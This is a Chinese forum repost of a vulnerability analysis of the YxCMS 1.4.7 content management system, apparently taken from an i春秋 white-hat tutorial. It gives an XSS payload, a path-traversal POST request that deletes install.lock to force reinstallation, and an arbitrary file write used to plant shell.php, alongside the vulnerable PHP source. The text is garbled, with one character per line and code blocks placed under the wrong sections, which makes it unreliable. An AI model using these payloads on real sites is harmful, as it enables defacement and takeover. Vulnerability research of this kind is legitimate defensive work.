论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[19493] 2019-06-06_白帽挖洞技能丨YxCMS1.4.7漏洞分析
文档创建者:
s7ckTeam
浏览次数:
17
最后更新:
2025-01-18
漏洞
17 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-06-06_白帽挖洞技能丨YxCMS1.4.7漏洞分析
白
帽
挖
洞
技
能
丨
Y
x
C
M
S
1
.
4
.
7
漏
洞
分
析
i
春
秋
2
0
1
9
-
0
6
-
0
6
这
几
天
有
小
伙
伴
留
言
给
我
们
,
想
看
一
些
关
于
后
台
的
漏
洞
分
析
,
今
天
i
春
秋
选
择
Y
x
C
M
S
1
.
4
.
7
版
本
,
理
论
内
容
结
合
实
际
案
例
进
行
深
度
分
析
,
帮
助
大
家
提
升
挖
洞
技
能
。
注
:
篇
幅
较
长
,
阅
读
用
时
约
7
分
钟
。
Y
X
c
m
s
是
基
于
P
H
P
+
M
y
S
q
l
开
发
,
采
用
C
A
N
P
H
P
框
架
编
写
的
,
是
一
款
高
效
、
灵
活
、
实
用
、
免
费
的
企
业
建
站
系
统
,
它
的
设
计
理
念
是
用
最
少
的
代
码
做
更
多
的
事
情
。
安
装
程
序
安
装
程
序
具
体
的
安
装
流
程
和
使
用
说
明
可
以
去
官
网
查
看
:
h
t
t
p
s
:
/
/
w
w
w
.
k
a
n
c
l
o
u
d
.
c
n
/
y
o
n
g
h
e
n
g
/
y
x
c
m
s
前
台
前
台
X
S
S
1
、
漏
洞
复
现
、
漏
洞
复
现
打
开
链
接
,
输
入
p
a
y
l
o
a
d
:
<
s
v
g
/
o
n
l
o
a
d
=
a
l
e
r
t
(
1
)
>
然
后
登
陆
后
台
,
查
看
审
核
。
点
击
编
辑
2
、
漏
洞
分
析
、
漏
洞
分
析
前
台
的
文
件
源
码
:
p
r
o
t
e
c
t
e
d
/
a
p
p
s
/
d
e
f
a
u
l
t
/
c
o
n
t
r
o
l
l
e
r
/
c
o
l
u
m
n
C
o
n
t
r
o
l
l
e
r
.
p
h
p
后
台
的
文
件
源
码
:
p
u
b
l
i
c
f
u
n
c
t
i
o
n
i
n
d
e
x
(
)
{
$
e
n
a
m
e
=
i
n
(
$
_
G
E
T
[
'
c
o
l
'
]
)
;
i
f
(
e
m
p
t
y
(
$
e
n
a
m
e
)
)
t
h
r
o
w
n
e
w
E
x
c
e
p
t
i
o
n
(
'
栏
目
名
不
能
为
空
~
'
,
4
0
4
)
;
$
s
o
r
t
i
n
f
o
=
m
o
d
e
l
(
'
s
o
r
t
'
)
-
>
f
i
n
d
(
"
e
n
a
m
e
=
'
{
$
e
n
a
m
e
}
'
"
,
'
i
d
,
n
a
m
e
,
e
n
a
m
e
,
p
a
t
h
,
u
r
l
,
t
y
p
e
,
d
e
e
p
,
m
e
t
h
o
d
,
t
p
l
i
s
t
,
k
e
y
w
o
r
d
s
,
d
e
s
c
r
i
p
t
i
o
n
,
e
x
t
e
n
d
i
d
'
$
p
a
t
h
=
$
s
o
r
t
i
n
f
o
[
'
p
a
t
h
'
]
.
'
,
'
.
$
s
o
r
t
i
n
f
o
[
'
i
d
'
]
;
$
d
e
e
p
=
$
s
o
r
t
i
n
f
o
[
'
d
e
e
p
'
]
+
1
;
$
t
h
i
s
-
>
c
o
l
=
$
e
n
a
m
e
;
s
w
i
t
c
h
(
$
s
o
r
t
i
n
f
o
[
'
t
y
p
e
'
]
)
{
c
a
s
e
1
:
/
/
文
章
$
t
h
i
s
-
>
n
e
w
s
l
i
s
t
(
$
s
o
r
t
i
n
f
o
,
$
p
a
t
h
,
$
d
e
e
p
)
;
b
r
e
a
k
;
c
a
s
e
2
:
/
/
图
集
$
t
h
i
s
-
>
p
h
o
t
o
l
i
s
t
(
$
s
o
r
t
i
n
f
o
,
$
p
a
t
h
,
$
d
e
e
p
)
;
b
r
e
a
k
;
c
a
s
e
3
:
/
/
单
页
$
t
h
i
s
-
>
p
a
g
e
(
$
s
o
r
t
i
n
f
o
,
$
p
a
t
h
,
$
d
e
e
p
)
;
b
r
e
a
k
;
c
a
s
e
4
:
/
/
应
用
b
r
e
a
k
;
c
a
s
e
5
:
/
/
自
定
义
b
r
e
a
k
;
c
a
s
e
6
:
/
/
表
单
$
t
h
i
s
-
>
e
x
t
e
n
d
(
$
s
o
r
t
i
n
f
o
,
$
p
a
t
h
,
$
d
e
e
p
)
;
b
r
e
a
k
;
d
e
f
a
u
l
t
:
t
h
r
o
w
n
e
w
E
x
c
e
p
t
i
o
n
(
'
未
知
的
栏
目
类
型
~
'
,
4
0
4
)
;
b
r
e
a
k
;
}
}
p
r
o
t
e
c
t
e
d
/
a
p
p
s
/
a
d
m
i
n
/
c
o
n
t
r
o
l
l
e
r
/
e
x
t
e
n
d
f
i
e
l
d
C
o
n
t
r
o
l
l
e
r
.
p
h
p
中
间
没
什
么
过
滤
,
具
体
可
以
看
这
篇
文
章
:
h
t
t
p
s
:
/
/
w
w
w
.
h
a
c
k
e
r
s
b
.
c
n
/
h
a
c
k
e
r
/
8
5
.
h
t
m
l
任
意
文
件
删
除
1
、
漏
洞
复
现
、
漏
洞
复
现
需
要
先
登
录
后
台
,
然
后
访
问
之
后
会
显
示
缩
略
图
不
存
在
:
P
a
y
l
o
a
d
:
p
u
b
l
i
c
f
u
n
c
t
i
o
n
m
e
s
e
d
i
t
(
)
{
$
t
a
b
l
e
i
d
=
i
n
t
v
a
l
(
$
_
G
E
T
[
'
t
a
b
i
d
'
]
)
;
i
f
(
!
$
t
h
i
s
-
>
c
h
e
c
k
C
o
n
P
o
w
e
r
(
'
e
x
t
e
n
d
'
,
$
t
a
b
l
e
i
d
)
)
$
t
h
i
s
-
>
e
r
r
o
r
(
'
您
没
有
权
限
管
理
此
独
立
表
内
容
~
'
)
;
$
i
d
=
i
n
t
v
a
l
(
$
_
G
E
T
[
'
i
d
'
]
)
;
/
/
信
息
i
d
i
f
(
e
m
p
t
y
(
$
t
a
b
l
e
i
d
)
|
|
e
m
p
t
y
(
$
i
d
)
)
$
t
h
i
s
-
>
e
r
r
o
r
(
'
参
数
错
误
~
'
)
;
$
t
a
b
l
e
i
n
f
o
=
m
o
d
e
l
(
'
e
x
t
e
n
d
'
)
-
>
s
e
l
e
c
t
(
"
i
d
=
'
{
$
t
a
b
l
e
i
d
}
'
O
R
p
i
d
=
'
{
$
t
a
b
l
e
i
d
}
'
"
,
'
i
d
,
t
a
b
l
e
i
n
f
o
,
n
a
m
e
,
t
y
p
e
,
d
e
f
v
a
l
u
e
'
i
f
(
e
m
p
t
y
(
$
t
a
b
l
e
i
n
f
o
)
)
$
t
h
i
s
-
>
e
r
r
o
r
(
'
自
定
义
表
不
存
在
~
'
)
;
i
f
(
!
$
t
h
i
s
-
>
i
s
P
o
s
t
(
)
)
{
$
i
n
f
o
=
m
o
d
e
l
(
'
e
x
t
e
n
d
'
)
-
>
E
x
t
f
i
n
d
(
$
t
a
b
l
e
i
n
f
o
[
0
]
[
'
t
a
b
l
e
i
n
f
o
'
]
,
"
i
d
=
'
{
$
i
d
}
'
"
)
;
$
t
h
i
s
-
>
i
n
f
o
=
$
i
n
f
o
;
$
t
h
i
s
-
>
t
a
b
l
e
i
d
=
$
t
a
b
l
e
i
d
;
$
t
h
i
s
-
>
i
d
=
$
i
d
;
$
t
h
i
s
-
>
t
a
b
l
e
i
n
f
o
=
$
t
a
b
l
e
i
n
f
o
;
$
t
h
i
s
-
>
d
i
s
p
l
a
y
(
)
;
}
e
l
s
e
{
f
o
r
(
$
i
=
1
;
$
i
<
c
o
u
n
t
(
$
t
a
b
l
e
i
n
f
o
)
;
$
i
+
+
)
{
i
f
(
i
s
_
a
r
r
a
y
(
$
_
P
O
S
T
[
$
t
a
b
l
e
i
n
f
o
[
$
i
]
[
'
t
a
b
l
e
i
n
f
o
'
]
]
)
)
$
d
a
t
a
[
$
t
a
b
l
e
i
n
f
o
[
$
i
]
[
'
t
a
b
l
e
i
n
f
o
'
]
]
=
i
m
p
l
o
d
e
(
'
,
'
,
$
_
P
O
S
T
[
$
t
a
b
l
e
i
n
f
o
[
$
i
]
[
'
t
a
b
l
e
i
n
f
o
'
]
]
)
;
e
l
s
e
$
d
a
t
a
[
$
t
a
b
l
e
i
n
f
o
[
$
i
]
[
'
t
a
b
l
e
i
n
f
o
'
]
]
=
h
t
m
l
_
i
n
(
$
_
P
O
S
T
[
$
t
a
b
l
e
i
n
f
o
[
$
i
]
[
'
t
a
b
l
e
i
n
f
o
'
]
]
)
;
}
i
f
(
m
o
d
e
l
(
'
e
x
t
e
n
d
'
)
-
>
E
x
t
u
p
(
$
t
a
b
l
e
i
n
f
o
[
0
]
[
'
t
a
b
l
e
i
n
f
o
'
]
,
"
i
d
=
'
{
$
i
d
}
'
"
,
$
d
a
t
a
)
)
$
t
h
i
s
-
>
s
u
c
c
e
s
s
(
'
修
改
成
功
~
'
e
l
s
e
$
t
h
i
s
-
>
e
r
r
o
r
(
'
信
息
修
改
失
败
~
'
)
;
}
}
h
t
t
p
:
/
/
s
b
.
c
o
m
/
i
n
d
e
x
.
p
h
p
?
r
=
a
d
m
i
n
/
p
h
o
t
o
/
d
e
l
p
i
c
P
O
S
T
:
p
i
c
n
a
m
e
=
.
.
/
.
.
/
p
r
o
t
e
c
t
e
d
/
a
p
p
s
/
i
n
s
t
a
l
l
/
i
n
s
t
a
l
l
.
l
o
c
k
然
后
访
问
网
站
首
页
就
会
自
动
转
到
安
装
的
页
面
2
、
漏
洞
分
析
、
漏
洞
分
析
漏
洞
文
件
:
,
在
第
3
5
5
行
的
d
e
l
p
i
c
(
)
函
数
,
可
以
看
到
接
收
P
O
S
T
过
来
的
值
,
然
后
等
于
文
件
开
头
定
义
的
静
态
变
量
。
没
有
对
传
入
的
值
进
行
任
何
的
过
滤
,
使
用
函
数
判
断
一
下
文
件
是
否
存
在
,
u
n
l
i
n
k
执
行
删
除
操
作
。
p
r
o
t
e
c
t
e
d
/
a
p
p
s
/
a
d
m
i
n
/
c
o
n
t
r
o
l
l
e
r
/
p
h
o
t
o
C
o
n
t
r
o
l
l
e
r
.
p
h
p
$
p
i
c
n
a
m
e
$
p
a
t
h
s
t
a
t
i
c
p
r
o
t
e
c
t
e
d
$
u
p
l
o
a
d
p
a
t
h
=
'
'
;
/
/
图
片
上
传
路
径
f
i
l
e
_
e
x
i
s
t
s
(
)
任
意
文
件
写
入
任
意
文
件
写
入
1
、
漏
洞
复
现
、
漏
洞
复
现
打
开
页
面
打
开
我
们
的
文
件
监
控
软
件
p
u
b
l
i
c
f
u
n
c
t
i
o
n
d
e
l
p
i
c
(
)
{
i
f
(
e
m
p
t
y
(
$
_
P
O
S
T
[
'
p
i
c
n
a
m
e
'
]
)
)
$
t
h
i
s
-
>
e
r
r
o
r
(
'
参
数
错
误
~
'
)
;
$
p
i
c
n
a
m
e
=
$
_
P
O
S
T
[
'
p
i
c
n
a
m
e
'
]
;
$
p
a
t
h
=
$
t
h
i
s
-
>
u
p
l
o
a
d
p
a
t
h
;
i
f
(
f
i
l
e
_
e
x
i
s
t
s
(
$
p
a
t
h
.
$
p
i
c
n
a
m
e
)
)
@
u
n
l
i
n
k
(
$
p
a
t
h
.
$
p
i
c
n
a
m
e
)
;
e
l
s
e
{
e
c
h
o
'
图
片
不
存
在
~
'
;
r
e
t
u
r
n
;
}
i
f
(
f
i
l
e
_
e
x
i
s
t
s
(
$
p
a
t
h
.
'
t
h
u
m
b
_
'
.
$
p
i
c
n
a
m
e
)
)
@
u
n
l
i
n
k
(
$
p
a
t
h
.
'
t
h
u
m
b
_
'
.
$
p
i
c
n
a
m
e
)
;
e
l
s
e
{
e
c
h
o
'
缩
略
图
不
存
在
~
'
;
r
e
t
u
r
n
;
}
e
c
h
o
'
原
图
以
及
缩
略
图
删
除
成
功
~
'
;
}
F
o
l
d
e
r
C
h
a
n
g
e
s
V
i
e
w
输
入
我
们
的
程
序
路
径
然
后
写
s
h
e
l
l
.
p
h
p
文
件
名
,
写
入
我
们
的
代
码
。
D
:
p
h
p
S
t
u
d
y
P
H
P
T
u
t
o
r
i
a
l
W
W
W
Y
X
c
m
s
然
后
会
在
下
面
生
成
我
们
写
入
的
文
件
。
p
r
o
t
e
c
t
e
d
a
p
p
s
d
e
f
a
u
l
t
v
i
e
w
d
e
f
a
u
l
t
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页